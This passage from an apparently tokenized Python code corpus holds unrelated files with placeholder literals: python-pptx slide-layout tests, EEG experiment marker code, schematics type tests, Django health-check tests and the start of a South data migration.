shapes <EOL> _LayoutShapeTree_ . assert_called_once_with ( slide_layout ) <EOL> assert shapes is layout_shape_tree_ <EOL> def it_provides_access_to_its_placeholders ( self , placeholders_fixture ) : <EOL> slide_layout , _LayoutPlaceholders_ , layout_placeholders_ = ( <EOL> placeholders_fixture <EOL> ) <EOL> placeholders = slide_layout . placeholders <EOL> _LayoutPlaceholders_ . assert_called_once_with ( slide_layout ) <EOL> assert placeholders is layout_placeholders_ <EOL> def it_can_iterate_over_the_clonable_placeholders_it_contains ( <EOL> self , cloneable_fixture ) : <EOL> slide_layout , expected_placeholders = cloneable_fixture <EOL> cloneable_placeholders = ( <EOL> list ( slide_layout . iter_cloneable_placeholders ( ) ) <EOL> ) <EOL> assert cloneable_placeholders == expected_placeholders <EOL> @ pytest . fixture ( params = [ <EOL> ( ( PP_PLACEHOLDER . TITLE , PP_PLACEHOLDER . BODY ) , ( <NUM_LIT:0> , <NUM_LIT:1> ) ) , <EOL> ( ( PP_PLACEHOLDER . TITLE , PP_PLACEHOLDER . DATE ) , ( <NUM_LIT:0> , ) ) , <EOL> ( ( PP_PLACEHOLDER . DATE , PP_PLACEHOLDER . OBJECT ) , ( <NUM_LIT:1> , ) ) , <EOL> ( ( PP_PLACEHOLDER . DATE , PP_PLACEHOLDER . FOOTER ) , ( ) ) , <EOL> ] ) <EOL> def cloneable_fixture ( <EOL> self , request , placeholders_ , placeholder_ , placeholder_2_ ) : <EOL> ph_types , expected_indices = request . param <EOL> slide_layout = SlideLayout ( None , None , None , None ) <EOL> placeholder_ . ph_type , placeholder_2_ . ph_type = ph_types <EOL> expected_placeholders = [ ] <EOL> for idx in expected_indices : <EOL> expected_placeholders . append ( placeholders_ . return_value [ idx ] ) <EOL> return slide_layout , expected_placeholders <EOL> @ pytest . fixture <EOL> def master_fixture ( self , slide_master_ , part_related_by_ ) : <EOL> slide_layout = SlideLayout ( None , None , None , None ) <EOL> return slide_layout , slide_master_ <EOL> @ pytest . fixture <EOL> def placeholders_fixture ( <EOL> self , _LayoutPlaceholders_ , layout_placeholders_ ) : <EOL> slide_layout = SlideLayout ( None , None , None , None ) <EOL> return slide_layout , _LayoutPlaceholders_ , layout_placeholders_ <EOL> @ pytest . fixture <EOL> def shapes_fixture ( self , _LayoutShapeTree_ , layout_shape_tree_ ) : <EOL> slide_layout = SlideLayout ( None , None , None , None ) <EOL> return slide_layout , _LayoutShapeTree_ , layout_shape_tree_ <EOL> @ pytest . fixture <EOL> def _LayoutPlaceholders_ ( self , request , layout_placeholders_ ) : <EOL> return class_mock ( <EOL> request , '<STR_LIT>' , <EOL> return_value = layout_placeholders_ <EOL> ) <EOL> @ pytest . fixture <EOL> def _LayoutShapeTree_ ( self , request , layout_shape_tree_ ) : <EOL> return class_mock ( <EOL> request , '<STR_LIT>' , <EOL> return_value = layout_shape_tree_ <EOL> ) <EOL> @ pytest . fixture <EOL> def layout_placeholders_ ( self , request ) : <EOL> return instance_mock ( request , _LayoutPlaceholders ) <EOL> @ pytest . fixture <EOL> def layout_shape_tree_ ( self , request ) : <EOL> return instance_mock ( request , _LayoutShapeTree ) <EOL> @ pytest . fixture <EOL> def part_related_by_ ( self , request , slide_master_ ) : <EOL> return method_mock ( <EOL> request , SlideLayout , '<STR_LIT>' , <EOL> return_value = slide_master_ <EOL> ) <EOL> @ pytest . fixture <EOL> def placeholder_ ( self , request ) : <EOL> return instance_mock ( request , LayoutPlaceholder ) <EOL> @ pytest . fixture <EOL> def placeholder_2_ ( self , request ) : <EOL> return instance_mock ( request , LayoutPlaceholder ) <EOL> @ pytest . fixture <EOL> def placeholders_ ( self , request , placeholder_ , placeholder_2_ ) : <EOL> return property_mock ( <EOL> request , SlideLayout , '<STR_LIT>' , <EOL> return_value = [ placeholder_ , placeholder_2_ ] <EOL> ) <EOL> @ pytest . fixture <EOL> def slide_master_ ( self , request ) : <EOL> return instance_mock ( request , SlideMaster ) <EOL> class Describe_LayoutShapeTree ( object ) : <EOL> def it_constructs_a_layout_placeholder_for_a_placeholder_shape ( <EOL> self , factory_fixture ) : <EOL> layout_shapes , ph_elm_ , _LayoutShapeFactory_ , layout_placeholder_ = ( <EOL> factory_fixture <EOL> ) <EOL> layout_placeholder = layout_shapes . _shape_factory ( ph_elm_ ) <EOL> _LayoutShapeFactory_ . assert_called_once_with ( ph_elm_ , layout_shapes ) <EOL> assert layout_placeholder is layout_placeholder_ <EOL> @ pytest . fixture <EOL> def factory_fixture ( <EOL> self , ph_elm_ , _LayoutShapeFactory_ , layout_placeholder_ ) : <EOL> layout_shapes = _LayoutShapeTree ( None ) <EOL> return ( <EOL> layout_shapes , ph_elm_ , _LayoutShapeFactory_ , layout_placeholder_ <EOL> ) <EOL> @ pytest . fixture <EOL> def layout_placeholder_ ( self , request ) : <EOL> return instance_mock ( request , LayoutPlaceholder ) <EOL> @ pytest . fixture <EOL> def _LayoutShapeFactory_ ( self , request , layout_placeholder_ ) : <EOL> return function_mock ( <EOL> request , '<STR_LIT>' , <EOL> return_value = layout_placeholder_ <EOL> ) <EOL> @ pytest . fixture <EOL> def ph_elm_ ( self , request ) : <EOL> return instance_mock ( request , CT_Shape ) <EOL> class Describe_LayoutShapeFactory ( object ) : <EOL> def it_constructs_a_layout_placeholder_for_a_shape_element ( <EOL> self , factory_fixture ) : <EOL> shape_elm , parent_ , ShapeConstructor_ , shape_ = factory_fixture <EOL> shape = _LayoutShapeFactory ( shape_elm , parent_ ) <EOL> ShapeConstructor_ . assert_called_once_with ( shape_elm , parent_ ) <EOL> assert shape is shape_ <EOL> @ pytest . fixture ( params = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def factory_fixture ( <EOL> self , request , ph_bldr , slide_layout_ , _LayoutPlaceholder_ , <EOL> layout_placeholder_ , BaseShapeFactory_ , base_shape_ ) : <EOL> shape_bldr , ShapeConstructor_ , shape_mock = { <EOL> '<STR_LIT>' : ( ph_bldr , _LayoutPlaceholder_ , layout_placeholder_ ) , <EOL> '<STR_LIT>' : ( an_sp ( ) , BaseShapeFactory_ , base_shape_ ) , <EOL> '<STR_LIT>' : ( a_pic ( ) , BaseShapeFactory_ , base_shape_ ) , <EOL> } [ request . param ] <EOL> shape_elm = shape_bldr . with_nsdecls ( ) . element <EOL> return shape_elm , slide_layout_ , ShapeConstructor_ , shape_mock <EOL> @ pytest . fixture <EOL> def BaseShapeFactory_ ( self , request , base_shape_ ) : <EOL> return function_mock ( <EOL> request , '<STR_LIT>' , <EOL> return_value = base_shape_ <EOL> ) <EOL> @ pytest . fixture <EOL> def base_shape_ ( self , request ) : <EOL> return instance_mock ( request , BaseShape ) <EOL> @ pytest . fixture <EOL> def _LayoutPlaceholder_ ( self , request , layout_placeholder_ ) : <EOL> return class_mock ( <EOL> request , '<STR_LIT>' , <EOL> return_value = layout_placeholder_ <EOL> ) <EOL> @ pytest . fixture <EOL> def layout_placeholder_ ( self , request ) : <EOL> return instance_mock ( request , LayoutPlaceholder ) <EOL> @ pytest . fixture <EOL> def ph_bldr ( self ) : <EOL> return ( <EOL> an_sp ( ) . with_child ( <EOL> an_nvSpPr ( ) . with_child ( <EOL> an_nvPr ( ) . with_child ( <EOL> a_ph ( ) . with_idx ( <NUM_LIT:1> ) ) ) ) <EOL> ) <EOL> @ pytest . fixture <EOL> def slide_layout_ ( self , request ) : <EOL> return instance_mock ( request , SlideLayout ) <EOL> class Describe_LayoutPlaceholders ( object ) : <EOL> def it_constructs_a_layout_placeholder_for_a_placeholder_shape ( <EOL> self , factory_fixture ) : <EOL> layout_placeholders , ph_elm_ = factory_fixture [ : <NUM_LIT:2> ] <EOL> _LayoutShapeFactory_ , layout_placeholder_ = factory_fixture [ <NUM_LIT:2> : ] <EOL> layout_placeholder = layout_placeholders . _shape_factory ( ph_elm_ ) <EOL> _LayoutShapeFactory_ . assert_called_once_with ( <EOL> ph_elm_ , layout_placeholders <EOL> ) <EOL> assert layout_placeholder is layout_placeholder_ <EOL> def it_can_find_a_placeholder_by_idx_value ( self , get_fixture ) : <EOL> layout_placeholders , ph_idx , placeholder_ = get_fixture <EOL> placeholder = layout_placeholders . get ( idx = ph_idx ) <EOL> assert placeholder is placeholder_ <EOL> def it_returns_default_if_placeholder_having_idx_not_found ( <EOL> self , default_fixture ) : <EOL> layout_placeholders = default_fixture <EOL> default = '<STR_LIT>' <EOL> placeholder = layout_placeholders . get ( '<STR_LIT>' , default ) <EOL> assert placeholder is default <EOL> @ pytest . fixture <EOL> def default_fixture ( self , _iter_ ) : <EOL> layout_placeholders = _LayoutPlaceholders ( None ) <EOL> return layout_placeholders <EOL> @ pytest . fixture <EOL> def factory_fixture ( <EOL> self , ph_elm_ , _LayoutShapeFactory_ , layout_placeholder_ ) : <EOL> layout_placeholders = _LayoutPlaceholders ( None ) <EOL> return ( <EOL> layout_placeholders , ph_elm_ , _LayoutShapeFactory_ , <EOL> layout_placeholder_ <EOL> ) <EOL> @ pytest . fixture ( params = [ <NUM_LIT:0> , <NUM_LIT:1> ] ) <EOL> def get_fixture ( self , request , _iter_ , placeholder_ , placeholder_2_ ) : <EOL> layout_placeholders = _LayoutPlaceholders ( None ) <EOL> ph_idx = request . param <EOL> ph_shape_ = { <NUM_LIT:0> : placeholder_ , <NUM_LIT:1> : placeholder_2_ } [ request . param ] <EOL> return layout_placeholders , ph_idx , ph_shape_ <EOL> @ pytest . fixture <EOL> def _iter_ ( self , request , placeholder_ , placeholder_2_ ) : <EOL> return method_mock ( <EOL> request , _LayoutPlaceholders , '<STR_LIT>' , <EOL> return_value = iter ( [ placeholder_ , placeholder_2_ ] ) <EOL> ) <EOL> @ pytest . fixture <EOL> def layout_placeholder_ ( self , request ) : <EOL> return instance_mock ( request , LayoutPlaceholder ) <EOL> @ pytest . fixture <EOL> def _LayoutShapeFactory_ ( self , request , layout_placeholder_ ) : <EOL> return function_mock ( <EOL> request , '<STR_LIT>' , <EOL> return_value = layout_placeholder_ <EOL> ) <EOL> @ pytest . fixture <EOL> def ph_elm_ ( self , request ) : <EOL> return instance_mock ( request , CT_Shape ) <EOL> @ pytest . fixture <EOL> def placeholder_ ( self , request ) : <EOL> return instance_mock ( request , LayoutPlaceholder , idx = <NUM_LIT:0> ) <EOL> @ pytest . fixture <EOL> def placeholder_2_ ( self , request ) : <EOL> return instance_mock ( request , LayoutPlaceholder , idx = <NUM_LIT:1> ) </s>
<s> import time <EOL> import os <EOL> import socket <EOL> import sys <EOL> global marker_log <EOL> marker_log = None <EOL> global lsl_backend <EOL> lsl_backend = None <EOL> global river_backend <EOL> river_backend = None <EOL> def init_markers ( lsl , logfile , datariver ) : <EOL> """<STR_LIT>""" <EOL> if lsl : <EOL> try : <EOL> global lsl_backend <EOL> import pylsl . pylsl as pylsl <EOL> info = pylsl . stream_info ( "<STR_LIT>" , "<STR_LIT>" , <NUM_LIT:1> , <NUM_LIT:0> , pylsl . cf_string , "<STR_LIT>" + socket . gethostname ( ) + time . asctime ( ) ) <EOL> lsl_backend = pylsl . stream_outlet ( info ) <EOL> lsl_backend . pylsl = pylsl <EOL> print "<STR_LIT>" <EOL> except : <EOL> print "<STR_LIT>" <EOL> if logfile : <EOL> try : <EOL> for k in xrange ( <NUM_LIT> ) : <EOL> fname = '<STR_LIT>' + str ( k ) + '<STR_LIT>' <EOL> if not os . path . exists ( fname ) : <EOL> global marker_log <EOL> marker_log = open ( fname , '<STR_LIT:w>' ) <EOL> break <EOL> print "<STR_LIT>" <EOL> except : <EOL> print "<STR_LIT>" <EOL> if datariver : <EOL> try : <EOL> global river_backend <EOL> import framework . eventmarkers . datariver_backend <EOL> river_backend = framework . eventmarkers . datariver_backend <EOL> river_backend . send_marker ( int ( <NUM_LIT> ) ) <EOL> print "<STR_LIT>" <EOL> except : <EOL> print "<STR_LIT>" <EOL> def send_marker ( markercode ) : <EOL> """<STR_LIT>""" <EOL> global lsl_backend <EOL> if lsl_backend is not None : <EOL> lsl_backend . push_sample ( lsl_backend . pylsl . vectorstr ( [ str ( markercode ) ] ) , lsl_backend . pylsl . local_clock ( ) , True ) <EOL> global marker_log <EOL> if marker_log is not None : <EOL> marker_log . write ( repr ( time . time ( ) ) + '<STR_LIT>' + str ( markercode ) + '<STR_LIT:\n>' ) <EOL> global river_backend <EOL> if river_backend is not None : <EOL> river_backend . send_marker ( int ( markercode ) ) </s>
<s> from framework . latentmodule import LatentModule <EOL> import random <EOL> class Main ( LatentModule ) : <EOL> def __init__ ( self ) : <EOL> LatentModule . __init__ ( self ) <EOL> self . trials1 = <NUM_LIT:5> <EOL> self . trials2 = <NUM_LIT:5> <EOL> self . a_probability = <NUM_LIT:0.5> <EOL> def run ( self ) : <EOL> self . marker ( <NUM_LIT:10> ) <EOL> self . write ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> self . write ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . write ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> for k in range ( self . trials1 ) : <EOL> self . crosshair ( <NUM_LIT:3> ) <EOL> if random . random ( ) < self . a_probability : <EOL> self . marker ( <NUM_LIT:1> ) <EOL> self . write ( '<STR_LIT:A>' , scale = <NUM_LIT:0.5> ) <EOL> else : <EOL> self . marker ( <NUM_LIT:2> ) <EOL> self . write ( '<STR_LIT>' , scale = <NUM_LIT:0.5> ) <EOL> self . sleep ( <NUM_LIT:2> ) <EOL> self . write ( '<STR_LIT>' ) <EOL> self . write ( '<STR_LIT>' , <NUM_LIT:5> ) <EOL> self . write ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> for k in range ( self . trials2 ) : <EOL> self . crosshair ( <NUM_LIT:3> ) <EOL> if random . random ( ) < <NUM_LIT:0.5> : <EOL> self . marker ( <NUM_LIT:3> ) <EOL> self . picture ( '<STR_LIT>' , <NUM_LIT:2> , scale = <NUM_LIT> ) <EOL> else : <EOL> self . marker ( <NUM_LIT:4> ) <EOL> self . picture ( '<STR_LIT>' , <NUM_LIT:2> , scale = <NUM_LIT> ) <EOL> self . sleep ( random . uniform ( <NUM_LIT:1> , <NUM_LIT:3> ) ) <EOL> self . sound ( '<STR_LIT>' , volume = <NUM_LIT:0.5> ) <EOL> self . write ( '<STR_LIT>' ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import logging <EOL> class MissingModule ( object ) : <EOL> __slots__ = [ "<STR_LIT>" ] <EOL> def __init__ ( self , name ) : <EOL> self . __name = name <EOL> def __getattr__ ( self , name ) : <EOL> if name . startswith ( "<STR_LIT>" ) : <EOL> raise AttributeError ( "<STR_LIT>" % ( self . __name , ) ) <EOL> raise ImportError ( "<STR_LIT>" % ( self . __name , ) ) <EOL> def __bool__ ( self ) : <EOL> return False <EOL> __nonzero__ = __bool__ <EOL> def safe_import ( name ) : <EOL> try : <EOL> mod = __import__ ( name , None , None , "<STR_LIT:*>" ) <EOL> except ImportError : <EOL> mod = MissingModule ( name ) <EOL> except Exception : <EOL> if sys . platform == "<STR_LIT>" and name == "<STR_LIT>" : <EOL> mod = MissingModule ( name ) <EOL> else : <EOL> raise <EOL> return mod <EOL> def setup_logger ( options ) : <EOL> logging_options = { } <EOL> if options . quiet : <EOL> logging_options [ '<STR_LIT>' ] = logging . ERROR <EOL> else : <EOL> logging_options [ '<STR_LIT>' ] = logging . DEBUG <EOL> if options . logfile : <EOL> logging_options [ '<STR_LIT:file>' ] = options . logfile <EOL> logging . basicConfig ( ** logging_options ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import unicode_literals , absolute_import <EOL> import bson <EOL> from . . common import * <EOL> from . . types import BaseType <EOL> from . . exceptions import ConversionError <EOL> class ObjectIdType ( BaseType ) : <EOL> """<STR_LIT>""" <EOL> MESSAGES = { <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> } <EOL> def __init__ ( self , auto_fill = False , ** kwargs ) : <EOL> self . auto_fill = auto_fill <EOL> super ( ObjectIdType , self ) . __init__ ( ** kwargs ) <EOL> def to_native ( self , value , context = None ) : <EOL> if not isinstance ( value , bson . objectid . ObjectId ) : <EOL> try : <EOL> value = bson . objectid . ObjectId ( str ( value ) ) <EOL> except bson . objectid . InvalidId : <EOL> raise ConversionError ( self . messages [ '<STR_LIT>' ] ) <EOL> return value <EOL> def to_primitive ( self , value , context = None ) : <EOL> return str ( value ) </s>
<s> import pytest <EOL> from schematics . datastructures import OrderedDict <EOL> from schematics . models import Model <EOL> from schematics . types import IntType , StringType <EOL> from schematics . types . compound import ModelType , ListType <EOL> from schematics . exceptions import ( <EOL> ConversionError , ValidationError , StopValidationError , DataError , <EOL> MockCreationError ) <EOL> def test_list_field ( ) : <EOL> class User ( Model ) : <EOL> ids = ListType ( StringType , required = True ) <EOL> c = User ( { <EOL> "<STR_LIT>" : [ ] <EOL> } ) <EOL> c . validate ( { '<STR_LIT>' : [ ] } ) <EOL> assert c . ids == [ ] <EOL> def test_list_with_default_type ( ) : <EOL> class CategoryStatsInfo ( Model ) : <EOL> slug = StringType ( ) <EOL> class PlayerInfo ( Model ) : <EOL> categories = ListType ( ModelType ( CategoryStatsInfo ) ) <EOL> math_stats = CategoryStatsInfo ( dict ( slug = "<STR_LIT>" ) ) <EOL> twilight_stats = CategoryStatsInfo ( dict ( slug = "<STR_LIT>" ) ) <EOL> info = PlayerInfo ( { <EOL> "<STR_LIT>" : [ { "<STR_LIT>" : "<STR_LIT>" } , { "<STR_LIT>" : "<STR_LIT>" } ] <EOL> } ) <EOL> assert info . categories == [ math_stats , twilight_stats ] <EOL> d = info . serialize ( ) <EOL> assert d == { <EOL> "<STR_LIT>" : [ { "<STR_LIT>" : "<STR_LIT>" } , { "<STR_LIT>" : "<STR_LIT>" } ] , <EOL> } <EOL> def test_set_default ( ) : <EOL> class CategoryStatsInfo ( Model ) : <EOL> slug = StringType ( ) <EOL> class PlayerInfo ( Model ) : <EOL> categories = ListType ( ModelType ( CategoryStatsInfo ) , <EOL> default = lambda : [ ] , <EOL> serialize_when_none = True ) <EOL> info = PlayerInfo ( ) <EOL> assert info . categories == [ ] <EOL> d = info . serialize ( ) <EOL> assert d == { <EOL> "<STR_LIT>" : [ ] , <EOL> } <EOL> def test_list_defaults_to_none ( ) : <EOL> class PlayerInfo ( Model ) : <EOL> following = ListType ( StringType ) <EOL> info = PlayerInfo ( ) <EOL> assert info . following is None <EOL> assert info . serialize ( ) == { <EOL> "<STR_LIT>" : None , <EOL> } <EOL> def test_list_default_to_none_embedded_model ( ) : <EOL> class QuestionResource ( Model ) : <EOL> url = StringType ( ) <EOL> class QuestionResources ( Model ) : <EOL> pictures = ListType ( ModelType ( QuestionResource ) ) <EOL> class Question ( Model ) : <EOL> id = StringType ( ) <EOL> resources = ModelType ( QuestionResources ) <EOL> class QuestionPack ( Model ) : <EOL> id = StringType ( ) <EOL> questions = ListType ( ModelType ( Question ) ) <EOL> question_pack = QuestionPack ( { <EOL> "<STR_LIT:id>" : "<STR_LIT:1>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT:id>" : "<STR_LIT:1>" , <EOL> } , <EOL> { <EOL> "<STR_LIT:id>" : "<STR_LIT:2>" , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : [ ] , <EOL> } <EOL> } , <EOL> { <EOL> "<STR_LIT:id>" : "<STR_LIT:3>" , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : [ { <EOL> "<STR_LIT:url>" : "<STR_LIT>" , <EOL> } ] <EOL> } <EOL> } , <EOL> ] <EOL> } ) <EOL> assert question_pack . questions [ <NUM_LIT:0> ] . resources is None <EOL> assert question_pack . questions [ <NUM_LIT:1> ] . resources [ "<STR_LIT>" ] == [ ] <EOL> resource = QuestionResource ( { "<STR_LIT:url>" : "<STR_LIT>" } ) <EOL> assert question_pack . questions [ <NUM_LIT:2> ] . resources [ "<STR_LIT>" ] [ <NUM_LIT:0> ] == resource <EOL> def test_validation_with_size_limits ( ) : <EOL> class User ( Model ) : <EOL> name = StringType ( ) <EOL> class Card ( Model ) : <EOL> users = ListType ( ModelType ( User ) , min_size = <NUM_LIT:1> , max_size = <NUM_LIT:2> , required = True ) <EOL> with pytest . raises ( DataError ) as exception : <EOL> c = Card ( { "<STR_LIT>" : None } ) <EOL> c . validate ( ) <EOL> assert exception . value . messages [ '<STR_LIT>' ] == [ u'<STR_LIT>' ] <EOL> with pytest . raises ( DataError ) as exception : <EOL> c = Card ( { "<STR_LIT>" : [ ] } ) <EOL> c . validate ( ) <EOL> assert exception . value . messages [ '<STR_LIT>' ] == [ u'<STR_LIT>' ] <EOL> with pytest . raises ( DataError ) as exception : <EOL> c = Card ( { "<STR_LIT>" : [ User ( ) , User ( ) , User ( ) ] } ) <EOL> c . validate ( ) <EOL> assert exception . value . messages [ '<STR_LIT>' ] == [ u'<STR_LIT>' ] <EOL> def test_list_field_required ( ) : <EOL> class User ( Model ) : <EOL> ids = ListType ( StringType ( required = True ) ) <EOL> c = User ( { <EOL> "<STR_LIT>" : [ ] <EOL> } ) <EOL> c . ids = [ ] <EOL> c . validate ( ) <EOL> c . ids = [ <NUM_LIT:1> ] <EOL> c . validate ( ) <EOL> c . ids = [ None ] <EOL> with pytest . raises ( DataError ) : <EOL> c . validate ( ) <EOL> def test_list_field_convert ( ) : <EOL> class User ( Model ) : <EOL> ids = ListType ( IntType ) <EOL> c = User ( { '<STR_LIT>' : [ "<STR_LIT:1>" , "<STR_LIT:2>" ] } ) <EOL> assert c . ids == [ <NUM_LIT:1> , <NUM_LIT:2> ] <EOL> def test_list_coercion ( ) : <EOL> field = ListType ( StringType ) <EOL> assert field ( ( '<STR_LIT>' , ) ) == [ '<STR_LIT>' ] <EOL> assert field ( set ( ( '<STR_LIT>' , ) ) ) == [ '<STR_LIT>' ] <EOL> with pytest . raises ( ConversionError ) : <EOL> field ( { <NUM_LIT:1> : '<STR_LIT:bar>' , <NUM_LIT:2> : '<STR_LIT>' , <NUM_LIT:0> : '<STR_LIT:foo>' } ) <EOL> with pytest . raises ( ConversionError ) : <EOL> field ( '<STR_LIT>' ) <EOL> with pytest . raises ( ConversionError ) : <EOL> field ( None ) <EOL> def test_list_model_field ( ) : <EOL> class User ( Model ) : <EOL> name = StringType ( ) <EOL> class Card ( Model ) : <EOL> users = ListType ( ModelType ( User ) , min_size = <NUM_LIT:1> , required = True ) <EOL> data = { '<STR_LIT>' : [ { '<STR_LIT:name>' : u'<STR_LIT>' } ] } <EOL> c = Card ( data ) <EOL> c . users = None <EOL> with pytest . raises ( DataError ) as exception : <EOL> c . validate ( ) <EOL> errors = exception . value . messages <EOL> assert errors [ '<STR_LIT>' ] == [ u'<STR_LIT>' ] <EOL> def test_list_model_field_exception_with_full_message ( ) : <EOL> class User ( Model ) : <EOL> name = StringType ( max_length = <NUM_LIT:1> ) <EOL> class Group ( Model ) : <EOL> users = ListType ( ModelType ( User ) ) <EOL> g = Group ( { '<STR_LIT>' : [ { '<STR_LIT:name>' : "<STR_LIT>" } ] } ) <EOL> with pytest . raises ( DataError ) as exception : <EOL> g . validate ( ) <EOL> assert exception . value . messages == { '<STR_LIT>' : { <NUM_LIT:0> : { '<STR_LIT:name>' : [ '<STR_LIT>' ] } } } <EOL> def test_compound_fields ( ) : <EOL> comments = ListType ( ListType , compound_field = StringType ) <EOL> assert isinstance ( comments . field , ListType ) <EOL> def test_mock_object ( ) : <EOL> assert ListType ( IntType , required = True ) . mock ( ) is not None <EOL> with pytest . raises ( MockCreationError ) as exception : <EOL> ListType ( IntType , min_size = <NUM_LIT:10> , max_size = <NUM_LIT:1> , required = True ) . mock ( ) <EOL> def test_mock_object_with_model_type ( ) : <EOL> class User ( Model ) : <EOL> name = StringType ( required = True ) <EOL> age = IntType ( required = True ) <EOL> assert isinstance ( ListType ( ModelType ( User ) , required = True ) . mock ( ) [ - <NUM_LIT:1> ] , User ) </s>
<s> __author__ = '<STR_LIT>' <EOL> __all__ = [ '<STR_LIT>' ] <EOL> import capnp <EOL> from pathlib import Path <EOL> import tempfile <EOL> temp_dir = Path ( tempfile . mkdtemp ( ) ) <EOL> capnp_schema_path = Path ( "<STR_LIT>" ) <EOL> if not capnp_schema_path . exists ( ) : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> lines = capnp_schema_path . open ( ) . readlines ( ) <EOL> skip_lines = [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> lines = ( line for line in lines if line not in skip_lines ) <EOL> capnp_schema_path = temp_dir / capnp_schema_path . name <EOL> capnp_schema_path . open ( '<STR_LIT:w>' ) . writelines ( lines ) <EOL> assert capnp_schema_path . exists ( ) <EOL> capnp . remove_import_hook ( ) <EOL> schema = capnp . load ( str ( capnp_schema_path ) ) </s>
<s> from django . test import TestCase <EOL> import mocker <EOL> import health <EOL> class CheckItem ( TestCase ) : <EOL> def test_call_must_be_implemented ( self ) : <EOL> class CheckIt ( health . CheckItem ) : <EOL> pass <EOL> check = CheckIt ( ) <EOL> self . assertRaises ( NotImplementedError , check ) <EOL> class CheckListTests ( mocker . MockerTestCase ) : <EOL> def test_refresh_in_minutes ( self ) : <EOL> import datetime <EOL> check_list = health . CheckList ( refresh = <NUM_LIT:2> ) <EOL> self . assertEqual ( datetime . timedelta ( minutes = <NUM_LIT:2> ) , <EOL> check_list . _refresh_rate ) <EOL> def test_latest_refresh_date_starts_as_None ( self ) : <EOL> check_list = health . CheckList ( refresh = <NUM_LIT:2> ) <EOL> self . assertIsNone ( check_list . _refreshed_at ) <EOL> def test_add_check ( self ) : <EOL> check_list = health . CheckList ( refresh = <NUM_LIT:2> ) <EOL> self . assertEqual ( len ( check_list . _check_list ) , <NUM_LIT:0> ) <EOL> class CheckIt ( health . CheckItem ) : <EOL> def __call__ ( self ) : <EOL> return True <EOL> check_list . add_check ( CheckIt ( ) ) <EOL> self . assertEqual ( len ( check_list . _check_list ) , <NUM_LIT:1> ) <EOL> def test_run ( self ) : <EOL> class CheckIt ( health . CheckItem ) : <EOL> """<STR_LIT>""" <EOL> def __call__ ( self ) : <EOL> return True <EOL> check_list = health . CheckList ( refresh = <NUM_LIT:2> ) <EOL> check = CheckIt ( ) <EOL> check_list . add_check ( check ) <EOL> check_list . run ( ) <EOL> self . assertEqual ( check_list . latest_report , <EOL> { '<STR_LIT>' : { '<STR_LIT:status>' : True , '<STR_LIT:description>' : '<STR_LIT>' } } ) <EOL> def test_since ( self ) : <EOL> """<STR_LIT>""" <EOL> import datetime <EOL> dt1 = datetime . datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT:15> , <NUM_LIT:10> , <NUM_LIT:10> , <NUM_LIT:10> ) <EOL> dt2 = datetime . datetime ( <NUM_LIT> , <NUM_LIT:12> , <NUM_LIT:15> , <NUM_LIT:10> , <NUM_LIT:11> , <NUM_LIT:10> ) <EOL> check_list = health . CheckList ( refresh = <NUM_LIT:1> ) <EOL> check_list . _refreshed_at = dt1 <EOL> mock_datetime = self . mocker . replace ( datetime ) <EOL> mock_datetime . datetime . now ( ) <EOL> self . mocker . result ( dt2 ) <EOL> self . mocker . replay ( ) <EOL> self . assertEqual ( check_list . since ( ) , '<STR_LIT>' ) </s>
<s> from south . utils import datetime_utils as datetime <EOL> from south . db import db <EOL> from south . v2 import DataMigration <EOL> from django . db import models <EOL> class Migration ( DataMigration ) : <EOL> def forwards ( self , orm ) : <EOL> "<STR_LIT>" <EOL> orm . Journal . objects . filter ( medline_title = None ) . update ( medline_title = '<STR_LIT>' ) <EOL> def backwards ( self , orm ) : <EOL> "<STR_LIT>" <EOL> orm . Journal . objects . filter ( medline_title = '<STR_LIT>' ) . update ( medline_title = None ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( 